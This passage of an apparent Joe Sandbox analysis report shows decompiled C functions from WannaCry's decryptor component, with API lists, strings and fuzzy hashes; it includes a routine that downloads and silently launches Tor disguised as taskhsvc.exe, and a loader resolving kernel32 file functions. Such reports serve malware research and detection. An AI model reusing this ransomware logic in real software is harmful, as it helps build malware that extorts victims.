				L00412D52();
				 *_t122 = 0x415bec;
				_t123 = __ecx + 0x880;
				_v16 = _t123;
				 *_t123 = 0x415c00;
				_v4 = 0x1f;
				L00412D52();
				 *_t123 = 0x415bec;
				_t124 = __ecx + 0x878;
				_v16 = _t124;
				 *_t124 = 0x415c00;
				_v4 = 0x20;
				L00412D52();
				 *_t124 = 0x415bec;
				_v4 = 0x18;
				 *((intOrPtr*)(__ecx + 0x870)) = 0x415a44;
				E00403F20(__ecx + 0x870);
				_v4 = 0x17;
				 *((intOrPtr*)(__ecx + 0x868)) = 0x415a44;
				E00403F20(__ecx + 0x868);
				_v4 = 0x16;
				 *((intOrPtr*)(__ecx + 0x860)) = 0x415a44;
				E00403F20(__ecx + 0x860);
				_v4 = 0x15;
				 *((intOrPtr*)(__ecx + 0x858)) = 0x415a44;
				E00403F20(__ecx + 0x858);
				_t125 = __ecx + 0x850;
				_v16 = _t125;
				 *_t125 = 0x415c00;
				_v4 = 0x21;
				L00412D52();
				 *_t125 = 0x415bec;
				_v4 = 0x13;
				 *((intOrPtr*)(__ecx + 0x848)) = 0x415a44;
				E00403F20(__ecx + 0x848);
				_v4 = 0x12;
				 *((intOrPtr*)(__ecx + 0x840)) = 0x415a44;
				E00403F20(__ecx + 0x840);
				_v4 = 0x11;
				 *((intOrPtr*)(__ecx + 0x838)) = 0x415a44;
				E00403F20(__ecx + 0x838);
				_t126 = __ecx + 0x830;
				_v16 = _t126;
				 *_t126 = 0x415c00;
				_v4 = 0x22;
				L00412D52();
				 *_t126 = 0x415bec;
				_v4 = 0xf;
				L00412CC2();
				_v4 = 0xe;
				L00412CC2();
				_v4 = 0xd;
				L00412CC2();
				_v4 = 0xc;
				L00412CC2();
				_v4 = 0xb;
				L00412EF6();
				_v4 = 0xa;
				E004050A0(__ecx + 0x444);
				_v4 = 9;
				E004050A0(__ecx + 0x3c8);
				_v4 = 8;
				E00404170(__ecx + 0x360);
				_v4 = 7;
				E00404170(__ecx + 0x2f8);
				_v4 = 6;
				E00404170(__ecx + 0x290);
				_v4 = 5;
				E00404170(__ecx + 0x228);
				_t127 = __ecx + 0x1a4;
				_v16 = _t127;
				 *_t127 = 0x4161a4;
				_v4 = 0x23;
				L00412F0E();
				_v4 = 4;
				L00412C9E();
				_v4 = 3;
				_t86 = E00405D90(__ecx + 0x120);
				_v4 = 2;
				L00412EF0();
				_v4 = 1;
				L00412EF0();
				_v4 = 0;
				L00412D4C();
				_v4 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v12;
				return _t86;
			}
















                                                      0x00405e10
                                                      0x00405e12
                                                      0x00405e1d
                                                      0x00405e1e
                                                      0x00405e2c
                                                      0x00405e30
                                                      0x00405e38
                                                      0x00405e3e
                                                      0x00405e42
                                                      0x00405e4a
                                                      0x00405e4f
                                                      0x00405e54
                                                      0x00405e5a
                                                      0x00405e60
                                                      0x00405e64
                                                      0x00405e6c
                                                      0x00405e71
                                                      0x00405e76
                                                      0x00405e7c
                                                      0x00405e82
                                                      0x00405e86
                                                      0x00405e8e
                                                      0x00405e93
                                                      0x00405e98
                                                      0x00405e9e
                                                      0x00405ea4
                                                      0x00405ea8
                                                      0x00405eb0
                                                      0x00405eb5
                                                      0x00405ec0
                                                      0x00405ec6
                                                      0x00405ecb
                                                      0x00405ed1
                                                      0x00405edc
                                                      0x00405ee1
                                                      0x00405ee7
                                                      0x00405ef2
                                                      0x00405ef7
                                                      0x00405efd
                                                      0x00405f08
                                                      0x00405f0d
                                                      0x00405f13
                                                      0x00405f18
                                                      0x00405f1e
                                                      0x00405f22
                                                      0x00405f2a
                                                      0x00405f2f
                                                      0x00405f3a
                                                      0x00405f40
                                                      0x00405f45
                                                      0x00405f4b
                                                      0x00405f56
                                                      0x00405f5b
                                                      0x00405f61
                                                      0x00405f6c
                                                      0x00405f71
                                                      0x00405f77
                                                      0x00405f7c
                                                      0x00405f82
                                                      0x00405f86
                                                      0x00405f8e
                                                      0x00405f93
                                                      0x00405f9e
                                                      0x00405fa4
                                                      0x00405fa9
                                                      0x00405fb4
                                                      0x00405fb9
                                                      0x00405fc4
                                                      0x00405fc9
                                                      0x00405fd4
                                                      0x00405fd9
                                                      0x00405fe4
                                                      0x00405fe9
                                                      0x00405ff4
                                                      0x00405ff9
                                                      0x00406004
                                                      0x00406009
                                                      0x00406014
                                                      0x00406019
                                                      0x00406024
                                                      0x00406029
                                                      0x00406034
                                                      0x00406039
                                                      0x00406044
                                                      0x00406049
                                                      0x0040604e
                                                      0x00406054
                                                      0x00406058
                                                      0x00406061
                                                      0x00406066
                                                      0x0040606d
                                                      0x00406072
                                                      0x0040607d
                                                      0x00406082
                                                      0x0040608d
                                                      0x00406092
                                                      0x0040609d
                                                      0x004060a2
                                                      0x004060aa
                                                      0x004060af
                                                      0x004060b6
                                                      0x004060be
                                                      0x004060c9
                                                      0x004060d3

                                                      APIs
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E4F
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E71
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E93
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405EB5
                                                        • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F2F
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F93
                                                      • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FA9
                                                      • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FB9
                                                      • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FC9
                                                      • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FD9
                                                      • #781.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FE9
                                                        • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
                                                        • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
                                                        • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                                        • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                                        • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                                        • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                                      • #654.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406066
                                                      • #765.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406072
                                                        • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
                                                        • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
                                                      • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406092
                                                      • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060A2
                                                      • #616.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060AF
                                                      • #641.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060BE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414$#800$#609#654#765#795$#616#641#781
                                                      • String ID: #
                                                      • API String ID: 2377847243-1885708031
                                                      • Opcode ID: 0807114d2ea519295407346a987a160cd163468119fa121364e43a1f09c9544f
                                                      • Instruction ID: 200a364df958368678b01019567048f7f095356612ddb79f46c50176d87071e4
                                                      • Opcode Fuzzy Hash: 0807114d2ea519295407346a987a160cd163468119fa121364e43a1f09c9544f
                                                      • Instruction Fuzzy Hash: C4710A74008782CED305EF65C0453DAFFE4AFA5348F54484EE0DA57292DBB86299CBE6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004032C0 Relevance: 31.6, APIs: 16, Strings: 2, Instructions: 114windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 69%
                                                      			E004032C0(intOrPtr __ecx) {
				intOrPtr _t16;
				long _t17;
				struct HFONT__* _t19;
				long _t20;
				long _t21;
				long _t23;
				int _t35;
				int _t38;
				int _t40;
				int _t47;
				intOrPtr _t48;

				_t48 = __ecx;
				L00412CB0();
				_t16 =  *0x42189c; // 0x0
				_t17 =  *(_t16 + 0x824);
				 *(__ecx + 0xe8) = _t17;
				_push(CreateSolidBrush(_t17));
				L00412D5E();
				_t47 = __ecx + 0xec;
				_t19 = CreateFontA(0x10, 0, 0, 0, 0x2bc, 0, 0, 0, 0, 0, 0, 0, 0x20, "Arial");
				_push(_t19);
				L00412D5E();
				_push(0x408);
				L00412CE6();
				if(_t47 != 0) {
					_t35 =  *(_t47 + 4);
				} else {
					_t35 = 0;
				}
				_t20 = SendMessageA( *(_t19 + 0x20), 0x30, _t35, 1);
				_push(0x409);
				L00412CE6();
				if(_t47 != 0) {
					_t38 =  *(_t47 + 4);
				} else {
					_t38 = 0;
				}
				_t21 = SendMessageA( *(_t20 + 0x20), 0x30, _t38, 1);
				_push(2);
				L00412CE6();
				if(_t47 != 0) {
					_t40 =  *(_t47 + 4);
				} else {
					_t40 = 0;
				}
				_t23 = SendMessageA( *(_t21 + 0x20), 0x30, _t40, 1);
				_push(0x40e);
				L00412CE6();
				if(_t47 != 0) {
					_t47 =  *(_t47 + 4);
				}
				SendMessageA( *(_t23 + 0x20), 0x30, _t47, 1);
				E00403CB0(_t48);
				SendMessageA( *(_t48 + 0xc0), 0x14e, 0, 0);
				_push(0xffffffff);
				_push(0xffffffff);
				_push(0);
				_push("Path");
				_push(0);
				L00412D58();
				SendMessageA( *(_t48 + 0x80), 0x101e, 0, 0x1f4);
				 *0x4217bc = _t48;
				return 1;
			}














                                                      0x004032c3
                                                      0x004032c5
                                                      0x004032ca
                                                      0x004032cf
                                                      0x004032d6
                                                      0x004032e2
                                                      0x004032e9
                                                      0x00403310
                                                      0x00403316
                                                      0x0040331c
                                                      0x0040331f
                                                      0x00403324
                                                      0x0040332b
                                                      0x00403332
                                                      0x00403338
                                                      0x00403334
                                                      0x00403334
                                                      0x00403334
                                                      0x0040334a
                                                      0x0040334c
                                                      0x00403353
                                                      0x0040335a
                                                      0x00403360
                                                      0x0040335c
                                                      0x0040335c
                                                      0x0040335c
                                                      0x0040336c
                                                      0x0040336e
                                                      0x00403372
                                                      0x00403379
                                                      0x0040337f
                                                      0x0040337b
                                                      0x0040337b
                                                      0x0040337b
                                                      0x0040338b
                                                      0x0040338d
                                                      0x00403394
                                                      0x0040339b
                                                      0x0040339d
                                                      0x0040339d
                                                      0x004033a9
                                                      0x004033ad
                                                      0x004033c2
                                                      0x004033c4
                                                      0x004033c6
                                                      0x004033c8
                                                      0x004033ca
                                                      0x004033cf
                                                      0x004033d4
                                                      0x004033ec
                                                      0x004033ee
                                                      0x004033fc

                                                      APIs
                                                      • #4710.MFC42 ref: 004032C5
                                                      • CreateSolidBrush.GDI32(?), ref: 004032DC
                                                      • #1641.MFC42(00000000), ref: 004032E9
                                                      • CreateFontA.GDI32(00000010,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00403316
                                                      • #1641.MFC42(00000000), ref: 0040331F
                                                      • #3092.MFC42(00000408,00000000), ref: 0040332B
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040334A
                                                      • #3092.MFC42(00000409), ref: 00403353
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040336C
                                                      • #3092.MFC42(00000002), ref: 00403372
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 0040338B
                                                      • #3092.MFC42(0000040E), ref: 00403394
                                                      • SendMessageA.USER32(?,00000030,?,00000001), ref: 004033A9
                                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004033C2
                                                      • #3996.MFC42(00000000,Path,00000000,000000FF,000000FF), ref: 004033D4
                                                      • SendMessageA.USER32(?,0000101E,00000000,000001F4), ref: 004033EC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#3092$#1641Create$#3996#4710BrushFontSolid
                                                      • String ID: Arial$Path
                                                      • API String ID: 2448086372-1872211634
                                                      • Opcode ID: 54367d22f402edf92e4263bf03619f0e020ba41dcf2f2cd55327d399c3bd1a02
                                                      • Instruction ID: b960ea7794e319caf0268359e71fff6d42033abaa4d887be80586a06fbef81fd
                                                      • Opcode Fuzzy Hash: 54367d22f402edf92e4263bf03619f0e020ba41dcf2f2cd55327d399c3bd1a02
                                                      • Instruction Fuzzy Hash: 4831D5B13907107BE6249760CD83FAE6659BB84B10F20421EB756BF2D1CEF8AD41879C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00406AE0 Relevance: 29.8, APIs: 14, Strings: 3, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 64%
                                                      			E00406AE0(void* __ecx) {
				char _v4;
				char _v12;
				char _v24;
				char _v28;
				intOrPtr _v36;
				char _v40;
				void* _v280;
				char _v284;
				char _v288;
				char _v292;
				void* _v296;
				char _v300;
				intOrPtr _v304;
				char _v308;
				void* _v312;
				void* _v316;
				char** _t26;
				long _t30;
				void* _t31;
				char** _t32;
				void* _t56;
				intOrPtr _t58;
				void* _t60;

				_push(0xffffffff);
				_push(E00413E61);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_t56 = __ecx;
				L00412DA6();
				_t26 =  &_v284;
				_push(_t26);
				_v4 = 0;
				L00412DD6();
				_push("msg\\");
				L00412CAA();
				_push("m_%s.wnry");
				_push(_t26);
				_push( &_v288);
				_v12 = 1;
				L00412CCE();
				sprintf( &_v292,  *_t26, _v304);
				_t60 = _t58 - 0x110 + 0xc;
				L00412CC2();
				_v24 = 0;
				L00412CC2();
				_t30 = GetFileAttributesA( &_v292);
				if(_t30 == 0xffffffff) {
					_push("msg\\");
					L00412CAA();
					_push("m_%s.wnry");
					_push(_t30);
					_t32 =  &_v300;
					_v28 = 2;
					_push(_t32);
					L00412CCE();
					sprintf( &_v308,  *_t32, "English");
					_t60 = _t60 + 0xc;
					L00412CC2();
					_v40 = 0;
					L00412CC2();
				}
				_t31 = E00406CF0(_t56,  &_v292);
				_v28 = 0xffffffff;
				L00412CC2();
				 *[fs:0x0] = _v36;
				return _t31;
			}


























                                                      0x00406ae0
                                                      0x00406ae2
                                                      0x00406aed
                                                      0x00406aee
                                                      0x00406afc
                                                      0x00406b03
                                                      0x00406b08
                                                      0x00406b0f
                                                      0x00406b10
                                                      0x00406b1b
                                                      0x00406b20
                                                      0x00406b29
                                                      0x00406b2e
                                                      0x00406b37
                                                      0x00406b38
                                                      0x00406b39
                                                      0x00406b41
                                                      0x00406b59
                                                      0x00406b5b
                                                      0x00406b62
                                                      0x00406b6b
                                                      0x00406b73
                                                      0x00406b7d
                                                      0x00406b86
                                                      0x00406b88
                                                      0x00406b91
                                                      0x00406b96
                                                      0x00406b9b
                                                      0x00406b9c
                                                      0x00406ba0
                                                      0x00406ba8
                                                      0x00406ba9
                                                      0x00406bbb
                                                      0x00406bbd
                                                      0x00406bc4
                                                      0x00406bcd
                                                      0x00406bd5
                                                      0x00406bd5
                                                      0x00406be1
                                                      0x00406bea
                                                      0x00406bf5
                                                      0x00406c03
                                                      0x00406c10

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800$#537#924sprintf$#3874#540AttributesFile
                                                      • String ID: English$m_%s.wnry$msg\
                                                      • API String ID: 3713669620-4206458537
                                                      • Opcode ID: f36c2dcfbfc0b931c038135b008570d0ce4cdd6941e9a910e96e45ef17743a79
                                                      • Instruction ID: 3ad7a17867ea9436e9d42ea8b12d154e8c58dea708134770199309aae3637b36
                                                      • Opcode Fuzzy Hash: f36c2dcfbfc0b931c038135b008570d0ce4cdd6941e9a910e96e45ef17743a79
                                                      • Instruction Fuzzy Hash: 4A316170108341AEC324EB25D941FDE77A4BBA8714F404E1EF59AC32D1EB789558CAA7
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040B840 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 138synchronizationprocessfileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 85%
                                                      			E0040B840() {
				void _v519;
				char _v520;
				void _v1039;
				char _v1040;
				struct _STARTUPINFOA _v1108;
				struct _PROCESS_INFORMATION _v1124;
				char _t29;
				void* _t46;
				char _t47;
				void* _t55;
				void* _t56;
				void* _t84;
				void* _t86;

				_t29 =  *0x421798; // 0x0
				_v1040 = _t29;
				memset( &_v1039, 0, 0x81 << 2);
				asm("stosw");
				asm("stosb");
				sprintf( &_v1040, "%s\\%s\\%s", "TaskData", "Tor", "taskhsvc.exe");
				_t84 =  &_v1124 + 0x20;
				if(GetFileAttributesA( &_v1040) != 0xffffffff) {
					L8:
					_v1108.cb = 0x44;
					_v1124.hProcess = 0;
					memset( &(_v1108.lpReserved), 0, 0x10 << 2);
					_v1124.hThread = 0;
					_v1124.dwProcessId = 0;
					_v1124.dwThreadId = 0;
					_v1108.wShowWindow = 0;
					_v1108.dwFlags = 1;
					if(CreateProcessA(0,  &_v1040, 0, 0, 0, 0x8000000, 0, 0,  &_v1108,  &_v1124) != 0) {
						if(WaitForSingleObject(_v1124.hProcess, 0x1388) == 0x102) {
							WaitForSingleObject(_v1124.hProcess, 0x7530);
						}
						CloseHandle(_v1124);
						CloseHandle(_v1124.hThread);
						return 1;
					} else {
						return 0;
					}
				} else {
					_t46 = E0040B6A0("TaskData", 0x4220e4, 0);
					_t86 = _t84 + 0xc;
					if(_t46 != 0) {
						L5:
						_t47 =  *0x421798; // 0x0
						_v520 = _t47;
						memset( &_v519, 0, 0x81 << 2);
						asm("stosw");
						asm("stosb");
						sprintf( &_v520, "%s\\%s\\%s", "TaskData", "Tor", "tor.exe");
						_t84 = _t86 + 0x20;
						if(GetFileAttributesA( &_v520) != 0xffffffff) {
							CopyFileA( &_v520,  &_v1040, 0);
							goto L8;
						} else {
							return 0;
						}
					} else {
						_push(0);
						_t55 = E0040B780( &_v1040, "TaskData", 0x422148);
						_t86 = _t86 + 0xc;
						if(_t55 != 0) {
							goto L5;
						} else {
							_push(0);
							_t56 = E0040B780( &_v1040, "TaskData", 0x4221ac);
							_t86 = _t86 + 0xc;
							if(_t56 != 0) {
								goto L5;
							} else {
								return _t56;
							}
						}
					}
				}
			}
















                                                      0x0040b846
                                                      0x0040b84d
                                                      0x0040b861
                                                      0x0040b863
                                                      0x0040b879
                                                      0x0040b87a
                                                      0x0040b885
                                                      0x0040b892
                                                      0x0040b95b
                                                      0x0040b966
                                                      0x0040b970
                                                      0x0040b974
                                                      0x0040b976
                                                      0x0040b982
                                                      0x0040b991
                                                      0x0040b995
                                                      0x0040b99f
                                                      0x0040b9b2
                                                      0x0040b9d6
                                                      0x0040b9e2
                                                      0x0040b9e2
                                                      0x0040b9ef
                                                      0x0040b9f6
                                                      0x0040ba02
                                                      0x0040b9b5
                                                      0x0040b9be
                                                      0x0040b9be
                                                      0x0040b898
                                                      0x0040b8a4
                                                      0x0040b8a9
                                                      0x0040b8ae
                                                      0x0040b8e9
                                                      0x0040b8e9
                                                      0x0040b8f3
                                                      0x0040b908
                                                      0x0040b90a
                                                      0x0040b923
                                                      0x0040b924
                                                      0x0040b929
                                                      0x0040b939
                                                      0x0040b955
                                                      0x00000000
                                                      0x0040b93c
                                                      0x0040b945
                                                      0x0040b945
                                                      0x0040b8b0
                                                      0x0040b8b0
                                                      0x0040b8bc
                                                      0x0040b8c1
                                                      0x0040b8c6
                                                      0x00000000
                                                      0x0040b8c8
                                                      0x0040b8c8
                                                      0x0040b8d4
                                                      0x0040b8d9
                                                      0x0040b8de
                                                      0x00000000
                                                      0x0040b8e8
                                                      0x0040b8e8
                                                      0x0040b8e8
                                                      0x0040b8de
                                                      0x0040b8c6
                                                      0x0040b8ae

                                                      APIs
                                                      • sprintf.MSVCRT ref: 0040B87A
                                                      • GetFileAttributesA.KERNEL32(?,?,?,?,00000000,?), ref: 0040B88D
                                                      • CreateProcessA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9AA
                                                        • Part of subcall function 0040B6A0: CreateDirectoryA.KERNEL32(?,00000000,?,76E83310,00000000,00000428), ref: 0040B6B4
                                                        • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                                      • sprintf.MSVCRT ref: 0040B924
                                                      • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040B934
                                                        • Part of subcall function 0040B780: CreateDirectoryA.KERNEL32(?,00000000,?,76E83310,00000428), ref: 0040B793
                                                        • Part of subcall function 0040B780: GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
                                                        • Part of subcall function 0040B780: DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
                                                        • Part of subcall function 0040B780: URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
                                                        • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B815
                                                      • CopyFileA.KERNEL32(?,?,00000000), ref: 0040B955
                                                      • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9CF
                                                      • WaitForSingleObject.KERNEL32(?,00007530,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9E2
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,08000000), ref: 0040B9EF
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,08000000), ref: 0040B9F6
                                                        • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B82C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Delete$Create$AttributesCloseDirectoryHandleObjectSingleWaitsprintf$CacheCopyDownloadEntryNameProcessTemp
                                                      • String ID: %s\%s\%s$D$TaskData$Tor$taskhsvc.exe$tor.exe
                                                      • API String ID: 4284242699-636499233
                                                      • Opcode ID: 09006d51623bf6324b32cedefd723180e41c2e4a94ec42060d8d8d083510f0e4
                                                      • Instruction ID: 35d80fb58dc1195f77b7b167f0129d00e9adf464e01d9889cd120ecf7352bd78
                                                      • Opcode Fuzzy Hash: 09006d51623bf6324b32cedefd723180e41c2e4a94ec42060d8d8d083510f0e4
                                                      • Instruction Fuzzy Hash: 0C4137716443007AD710DBA4EC41BEBB7D4AFE8700F90883FF698532E1D6B99548879E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00402C40 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 72libraryloaderCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E00402C40() {
				_Unknown_base(*)()* _t11;
				struct HINSTANCE__* _t23;

				if(E00404B70() == 0) {
					L12:
					return 0;
				} else {
					if( *0x4217a0 == 0) {
						_t23 = LoadLibraryA("kernel32.dll");
						if(_t23 == 0) {
							goto L12;
						} else {
							 *0x4217a0 = GetProcAddress(_t23, "CreateFileW");
							 *0x4217a4 = GetProcAddress(_t23, "WriteFile");
							 *0x4217a8 = GetProcAddress(_t23, "ReadFile");
							 *0x4217ac = GetProcAddress(_t23, "MoveFileW");
							 *0x4217b0 = GetProcAddress(_t23, "MoveFileExW");
							 *0x4217b4 = GetProcAddress(_t23, "DeleteFileW");
							_t11 = GetProcAddress(_t23, "CloseHandle");
							 *0x4217b8 = _t11;
							if( *0x4217a0 == 0 ||  *0x4217a4 == 0 ||  *0x4217a8 == 0 ||  *0x4217ac == 0 ||  *0x4217b0 == 0 ||  *0x4217b4 == 0 || _t11 == 0) {
								goto L12;
							} else {
								return 1;
							}
						}
					} else {
						return 1;
					}
				}
			}





                                                      0x00402c48
                                                      0x00402d1d
                                                      0x00402d20
                                                      0x00402c4e
                                                      0x00402c55
                                                      0x00402c69
                                                      0x00402c6d
                                                      0x00000000
                                                      0x00402c73
                                                      0x00402c88
                                                      0x00402c95
                                                      0x00402ca2
                                                      0x00402caf
                                                      0x00402cbc
                                                      0x00402cc9
                                                      0x00402cce
                                                      0x00402cd6
                                                      0x00402cde
                                                      0x00000000
                                                      0x00402d16
                                                      0x00402d1c
                                                      0x00402d1c
                                                      0x00402cde
                                                      0x00402c57
                                                      0x00402c5d
                                                      0x00402c5d
                                                      0x00402c55

                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32.dll), ref: 00402C63
                                                      • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00402C80
                                                      • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00402C8D
                                                      • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00402C9A
                                                      • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00402CA7
                                                      • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 00402CB4
                                                      • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 00402CC1
                                                      • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00402CCE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
